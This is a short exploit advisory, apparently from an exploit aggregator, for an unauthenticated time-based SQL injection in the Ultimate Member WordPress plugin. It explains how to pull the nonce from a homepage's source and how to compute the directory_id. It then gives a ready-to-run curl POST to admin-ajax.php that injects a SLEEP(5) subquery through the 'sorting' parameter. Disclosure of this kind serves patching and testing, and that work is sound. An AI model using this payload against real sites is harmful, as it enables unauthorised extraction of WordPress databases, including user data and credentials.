## https://sploitus.com/exploit?id=WPEX-ID:DCCA7ED0-B088-4B7D-9E22-07B858367975
Requirement: "Enable custom table for usermeta" option to be enabled (Ultimate Member > Settings > Misc)
As unauthenticated, retrieve the nonce from the source of the homepage by searching for var um_scripts. Then run the below cURL command and note the 5s delay from the response:
curl -X POST --data 'action=um_get_members&nonce=<NONCE>&directory_id=b9238&sorting=ID%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)' https://example.com/wp-admin/admin-ajax.php
PS: The directory_id calculated via "SUBSTRING( MD5( POST_ID ), 11, 5)" and in the example above, this is for POST_ID=1